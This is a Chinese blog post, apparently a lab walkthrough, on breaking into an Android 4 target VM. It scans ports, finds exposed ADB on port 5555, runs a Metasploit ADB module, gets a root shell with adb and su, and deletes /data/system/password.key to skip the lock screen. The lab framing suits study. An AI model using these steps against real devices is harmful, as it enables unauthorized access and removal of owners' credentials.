文档章节

入侵Android系统的小实验

o
 osc_n6euf5h6
发布于 2019/03/18 11:17
字数 409
阅读 45
收藏 0

1.信息收集

1)扫描目标IP和开放的端口

工具:ipscan.exe【扫描时间有点长,需耐心等待】

目标IP192.168.31.125

 

2)访问目标IP

目标开放了3个端口,分别是 5555808022000
尝试访问8080端口,访问如图:

 

根据页面提示 说留了个后门,用POST方式提交。直接跑目录可以看到出来一个 backdoor.php文件,访问后发现是假的后门,如图所示:

 

3)查看开放端口上的服务

nmap扫描开放端口 5555有个freeciv服务,经过网上查找是adb应用的服务端口

2. 脚本侵入

用msf5搜索adb的漏洞,结果有发现,找到了 16年的一个 远程命令执行漏洞,调用模块利用,如图:

 

对模块进行相应的设定

命令:set RHOSTS 192.168.31.125【设定目标IP

命令:set LHOST 192.168.31.103【设定本机IP

 

3. Getshell

执行利用脚本以后,是无法反弹到shell的,需要adb 去链接kali没有adb的,需要安装:输入命令:sudo apt-get install adb

1)第一步输入命令 adb connect 192.168.31.125:5555 

2第二步输入命令 adb shell 即可拿到shell

3)发现拿到shell是普通权限,输入 su 回车即可直接拿到root shell, 如图:

 

4. 清除密码文件

/data/system目录文件夹下找到密码文件password.key清除即可,如图:

 

输入命令:rm password.key,直接删除即可

6.成功入侵

删除密码文件后,进入Android4靶机,无需密码,直接回车即可进入系统,如图:

 

 

o
粉丝 0
博文 500
码字总数 0
作品 0
私信 提问
加载中
请先登录后再评论。

暂无文章

github的正确搜索方式

wc_飞豆
28分钟前
12
0
交叉编译-如何编译Android平台的可执行程序

首先来看看Linux平台下如何使用gcc编译出当下平台的可执行程序。 我们先来准备一个main.c文件 #include<stdio.h>int main(){ printf("Hello Gcc!"); return 0;} 上面是...

shzwork
32分钟前
15
0
Java 获取资源文件路径

1 问题描述 通过源码运行时,一般使用如下方式读取资源文件: String str = "1.jpg"; 资源文件与源码文件放在同一目录下,或者拥有同一父级目录: String str = "a/b/1.jpg"; 这样直接编译...

氷泠
今天
12
0
git 为项目设置用户名/邮箱/密码

1.找到项目所在目录下的 .git,进入.git文件夹,然后执行如下命令分别设置用户名和邮箱 git config user.name "Affandi" git config user.email "123333333@qq.com" 然后执行命令查看con......

有时很滑稽
今天
13
0
如何从int转换为String? - How do I convert from int to String?

问题: I'm working on a project where all conversions from int to String are done like this: 我正在一个项目中,所有从int到String转换都是这样完成的: int i = 5;String strI = "" ......

javail
今天
19
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部